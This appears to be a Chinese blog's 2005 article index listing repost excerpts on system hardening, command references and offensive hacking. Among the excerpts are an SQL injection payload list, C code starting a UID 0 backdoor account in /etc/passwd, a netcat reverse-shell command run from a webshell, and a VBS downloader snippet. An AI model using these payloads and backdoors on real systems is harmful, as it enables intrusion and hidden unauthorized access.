- 博客(36)
- 收藏
- 关注
RSS订阅原创 DEBUG命令大全
来源不明Debug 启动 Debug,它是可用于测试和调试 MS-DOS 可执行文件的程序。 Debug [[drive:][path] filename [parameters]] 参数 [drive:][path] filename 指定要测试的可执行文件的位置和名称。 parameters 指定要测试的可执行文件所需要的任何命令行信息。 ++ 说明 使用 Debug 命令但不指定要测试的文件
2005-03-15 15:57:00
1112
原创 LINUX 基准安全清单
来源:http://coolyan.ns110.cn/系统安全记录文件 操作系统内部的记录文件是检测是否有网络入侵的重要线索。如果你的系统是直接连到Internet,你发现有很多人对你的系统做Telnet/FTP登录尝试,可以运行"#more /var/log/secure | grep refused"来检查系统所受到的攻击,以便采取相应的对策,如使用SSH来替换Telnet/rlogin等。
2005-03-15 15:47:00
782
原创 防范WEB SHELL(整理文)
来源:http://fox.he100.com/做了1年时间的虚拟主机管理员,大概对NT下的WEB SHELL的防范也有一定的了解。现在通过整理一些高手的文章来说说如何防范WEBSHELL。常见的WEBSHELL也就是ASP,PHP,PERL,这些脚本写成的。市面上比较流行的WEBSHELL也就是海阳顶端网asp木马2005、桂林老兵的ASP站长助手(不知道算不算WEBSHELL,呵呵)、蓝屏AS
2005-03-09 02:44:00
1158
原创 打造安全的2003个人Web服务器
Win2003 Server的安全性较之Win2K确实有了很大的提高,但是用Win2003 Server作为服务器是否就真的安全了?如何才能打造一个安全的个人Web服务器?下面我们简单介绍一下......一、Windows Server2003的安装 1、安装系统最少两需要个分区,分区格式都采用NTFS格式 2、在断开网络的情况安装好2003系统 3、安装IIS,仅安装必要的 IIS 组件(
2005-03-03 18:33:00
649
原创 SQL安全设置攻略
出处:NB联盟日前SQL INJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQL SERVER数据库,正因为如此,很多人开始怀疑SQL SERVER的安全性。其实SQL SERVER 2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQL SERVER还是相当的安全的。当然和ORCAL、DB2等还是有差距,但是SQ
2005-03-03 18:25:00
681
原创 TCP/IP基础讲座
作者:代码罐头1: 1层,2层,3层? [罐头里的世界:TCP/IP基础讲座]这篇文章主要是面向自学TCP/IP的读者的.因为市面上讲解计算机网络的书虽然非常多,但是个人认为没有一本可以做到深入浅出的.都是照搬某些权威书籍中的概念,使得很多读者读了之后还是没有具体概念.希望我写的东西可以让大家有个具体概念,而不是只停留在能够背出官方的,严谨的,深奥的概念. 由于本人水平有限,如果你在文章中发
2005-03-01 09:12:00
861
原创 十项Linux安全管理技巧经验总结
作者:sFqRy 一、文件系统二、备份三、改进系统内部安全机制四、设置陷井和蜜罐五、将入侵消灭在萌芽状态六、反攻击检测七、改进登录八、使用单一登录九、掌握最新安全产品和技术十、多管齐下 由于Linux操作系统是一个开放源代码的免费操作系统,因此受到越来越多用户的欢迎。随着Linux操作系统在我国的不断普及,有关的政府部门更是将基于Linux开发具有自主版权的操作系统提高到保卫国家信息
2005-03-01 09:05:00
892
原创 VC快捷键大全
F1: 帮助Ctrl+O :OpenCtrl+P :PrintCtrl+N :NewCtrl+Shift+F2 :清除所有书签F2 :上一个书签Shift+F2 :上一个书签Alt+F2 :编辑书签Ctrl+F2 :添加/删除一个书签F12 :Goto definitionShift+F12 :Goto referenceCtrl+Num+ :Display
2005-03-01 08:05:00
614
原创 PHP注射库
or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 u
2005-03-01 07:35:00
655
原创 创建UNIX后门(初级篇,中级篇,高级篇)
作者:tiger初级篇 最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。 backdoor/backdoor1.c #include main() { FILE *fd; fd=fopen("/etc/pass
2005-03-01 07:32:00
793
原创 从IIS到SQL Server数据库安全
来源: 风闪网络学院从codered到nimda等,一大堆蠕虫把原来需要人工利用的漏洞都变成了程序自动利用了,大家还想去手工操作这些IIS漏洞么?让我们调整重心,去看看服务器常用的数据库吧。 一般网站都是基于数据库的,特别是ASP、PHP、JSP这样的用数据库来动态显示的网站。很多网站可能多注意的是操作系统的漏洞,但是对数据库和这些脚本的安全总是忽略,也没有太多注意。 从最比较普遍的
2005-03-01 07:30:00
829
原创 Linux Shell
本文的内容来源于 MUO 的 Basics 部分,其原始英文版可以从这里获得http://www.mandrakeuser.org/docs/。中文版来自吴晓光的CMUO http://dummy.linux.net.cn/~xgwu/cmuo/。MUO 是 Mandrake Linux(http://www.mandrakelinux.com/)为用户提供的入门手册,其内容实用并且实时更新,非常
2005-02-27 06:10:00
785
原创 Linux常用命令集
名称:cal 使用权限:所有使用者 使用方式:cal [-mjy] [month [year]] 说明: 显示日历。若只有一个参数,则代表年份(1-9999),显示该年的年历。年份必须全部写出:``cal 89/ 将不会是显示 1989 年的年历。使用两个参数,则表示月份及年份。若没有参数则显示这个月的月历。 1752 年 9 月第 3 日起改用西洋新历,因这时大部份的国家都采用新历,有 10 天
2005-02-27 06:00:00
772
原创 Linux基本命令
Linux系统管理命令 wall命令 功能:这个命令的功能是对全部已登录的用户发送信息,用户可以先把要发送的信息写好存入一个文件中,然后输入: # wall 这样就能对所有的用户发送信息了。 在上面的例子中符号“ # wall ‘Thank you!’ Broadcast message from root (tty1) Fri Nov 26 14:15:07 1999
2005-02-27 05:57:00
1141
原创 操作系统简述
LinuxAid 工程师 fjxufeng一、计算机软件与操作系统 功能强大的计算机自从走进了人类的生活就发挥着越来越重要的作用,随着时代的发展,计算机已与人们的日常生活息息相关。不能不说计算机软件日新月异的发展在此起着关键作用。可以这么说,离开了软件,计算机就成了废铜烂铁。计算机机软件大致可以分为两类:系统软件和应用软件。系统软件用于管理计算机资源,并为应用软件提供一个统一的平台。应用软
2005-02-27 04:54:00
1290
原创 如何使用IPSec 阻止特定网络协议和端口
来源:http://support.microsoft.com/概要Internet 协议安全 (IPSec) 筛选规则可用于帮助保护基于 Windows 2000 的计算机免遭病毒及蠕虫等威胁带来的、基于网络的攻击。本文介绍如何为入站和出站网络通信筛选特定的协议和端口组合。本文还包括用于确定当前是否为基于 Windows 2000 的计算机指定了 IPSec 策略的步骤、用于创
2005-02-27 03:52:00
1503
原创 哇!有黑客!!!(下)
作者:elly 来源:安全焦点论坛注意看前面打了*号的那些文件,说它们不是后门之类入侵者留下的文件我才不信。先随便打开一个最近修改过的(就在不久前)Svclog看看: 代码 ============================================================C:/WINNT/system32>type Svclog.logPerf
2005-02-27 03:50:00
2169
原创 哇!有黑客!!!(上)
作者:elly 来源:安全焦点论坛异象:昨夜西风凋碧树序幕:話説那日elly與衆人閒談完"黑客趨勢(趣事)"之後,獨自下樓喝茶去了。 鳳簫聲動,玉壺光轉,正恍惚閒,忽聞手機鈴聲。原是尋到一服務器,正在閒置,可為所用。於是登錄上去,稍做配置...PCAnywhere正在登录。方世玉的老妈的师兄经常说,安全第一,安全第一。上去之后,当然是先看看服务器的服务配置。运行"Services.msc"
2005-02-27 03:48:00
1300
原创 SQL注入法攻击一日通
出处:教主的BLOG此文章是对网上大量同类文章的分析与总结,并结合自己实施过程中的体会综合而成,其中有不少直接引用,没有注意出处,请原作者见谅)随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根 据程序返回
2005-02-27 02:20:00
1062
原创 SQL注射总结(一)
作者:岁月联盟 猪猪Sql注射总结(早源于or1=1) 最重要的表名:select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses最重要的一些用户名(默认sql数据库中存在着的)pu
2005-02-27 02:15:00
725
原创 2004·网络安全圈
创建时间:2005-01-10root (webmaster_at_xfocus.org)2004·网络安全圈网络安全焦点走进2005,我们回头看看,一年来网络安全圈内的风风雨雨,哪些我们只是听了个响?哪些是我们真切地触摸和感受的?圈里圈外,安全已经完全融入我们的生活……一、网络安全圈·趋势1.1 更多网络犯罪直接以经济利益为目的最吸引国人眼球的应该是腾讯,2004年两次QQ大规模无法使用,尤其是
2005-02-24 01:14:00
1038
原创 Windows下权限设置详解
创建时间:2005-02-15mrcool (mrcoolfuyu@tom.com)随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗?其实,只要你弄明白了NTFS系统下的权限设置问题,我们可以对crackers们说:NO!
2005-02-24 00:38:00
645
原创 google hacking的实现以及应用
google hacking的实现以及应用(上)本文作者:sniper文章出于:www.4ngel.net日 期 : 05/01/26修改/发布: 05/02/21本文仅做于技术讨论于研究,请勿用做其他用途.PS:庆祝一下暂时摆脱应试教育的魔爪,向那些打着素质教育暗地里搞应试教育的学校竖起中指!前言 google hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关
2005-02-24 00:31:00
827
原创 Widnwos 2000 命令集合
accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导 acsetups.exe > ACS setup DCOM server executable actmovie.exe > Direct Show setup tool
2005-02-23 05:03:00
493
原创 克隆帐户终结篇修正版
来源:岁月联盟 猪猪几句废话:黑基发了我的克隆帐户之终结篇后,很多朋友对我文章提出了宝贵意见.由于原文是自己无聊时随便写的,很多地方不够严谨.于是我重新整理了此文,补充了一些资料,修改了不够严谨的地方, 有问题欢迎来我blog上探讨.序:相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样那样的。其实克隆帐户很简单。就
2005-02-22 20:29:00
891
原创 sql injection终极利用方法
————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限原创:许文强(xwq),QQ:57133683声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。考虑再三,偶还是决定发出来。此招手段歹毒,利用范围广泛,可以说是只要是有sql
2005-02-21 00:29:00
614
原创 Sql注射中参数多次调用Echo解决办法
来源:情感网络 作者:xiaolu 我是在黑哥Blog看到的他写的,先引用黑哥的:Quote: 文/superhei 解决办法: 1.iget.vbs一次写入 在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写 Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments
2005-02-20 20:51:00
824
原创 通过webshell获得admin全攻略
作者:稻草人 QQ:16285939话说到花了九牛二虎的力气获得了一个webshell,当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~嘻嘻~~好跟我来,看看有什么可以利用的来提升权限****************************************************************************第一如果服务器上有装了pc
2005-02-20 20:46:00
1287
原创 nc的说明及使用
netcat被誉为网络安全界的‘瑞士军刀,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具, 能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几 乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个
2005-02-20 20:44:00
851
原创 解除TCP/IP限制的小技巧
作者:河马史诗 http://www.wrsky.com1.用NC反弹得到一个shell本机监听 NC -l -p 32WEBSHELL运行:x:/xxx/serv-u.exe "x:/xxx/nc.exe -e cmd.exe *.*.*.* port"得到一个shell2.CMD下导出注册表文件C:/>regedit -e x:/xxx/1.reg HKEY_LOCA
2005-02-20 20:42:00
851
原创 从上传webshell突破TCP/IP筛选到3389登陆
作者:lvhuana 来自:http://www.wrsky.com/日期:2004.12.11LvHuaNa一:得到webshell今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~突然发现一个聊天室特别的火暴,人数已
2005-02-20 20:41:00
879
原创 信息安全的隐患-GoogleHacking原理和防范
作者:zhaohuan@phack.org 来源:www.phack.org技术天地:GoogleHacking是利用Google的搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,最近这种以前由黑客手动进行操作的攻击手段可以通过一种新的蠕虫病毒来自动完成。为了引起大家对GoogleHacking的关注与重视,我们编发了这篇文章希望大家通过对Hack的攻击手段的了解,更好的保护自己的信息
2005-02-20 20:39:00
708
原创 常用的google关键字
foo1 foo2 (也就是关联,比如搜索xx公司 xx美女)operator:foofiletype:123 类型site:foo.com 相对直接看网站更有意思,可以得到许多意外的信息intext:foo intitle: fooltitle 标题哦allinurl:foo 搜索xx网站的所有相关连接。(踩点必备)links:foo 不要说就知道是它的相关链接
2005-02-20 20:38:00
916
原创 Google attack的利用
以后给出的形式是这样的,数字的后面跟的是要再google搜索的内容,后面跟着介绍和漏洞如何利用,由于本人时间有限制,所以就不翻译了,如果大家有兴趣的话自己翻译翻译吧.. 1.intitle:Login intext:"RT is ? Copyright" RT is an enterprise-grade ticketing system which enables a group o
2005-02-20 20:33:00
1628
原创 Google搜索从入门到精通v4.0
donquix 2002.81,前言2,摘要3,如何使用本文4,Google简介5,搜索入门6,初阶搜索 6.1,搜索结果要求包含两个及两个以上关键字 6.2,搜索结果要求不包含某些特定信息 6.3,搜索结果至少包含多个关键字中的任意一个7,杂项语法 7.1,通配符问题 7.2,关键字的字母大小写 7.3,搜索整个短语或者句子 7.4,搜索引擎忽略的字符以及强制搜索8,进阶搜索
2005-02-20 20:29:00
1116
原创 希望OL蝙蝠猪进化幸运猪的材料
马夫之扙、兔耳、狼皮、兔子毛球、鸡头、鸡上衣、鸡下裤、鸡爪、幸运草 森巴鸡之棍狼皮 马夫仗 兔耳朵 幸运卡 幸运草 鸡头 鸡腿裤 鸡上衣 鸡脚 兔子毛球
2005-02-15 21:15:00
1936
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人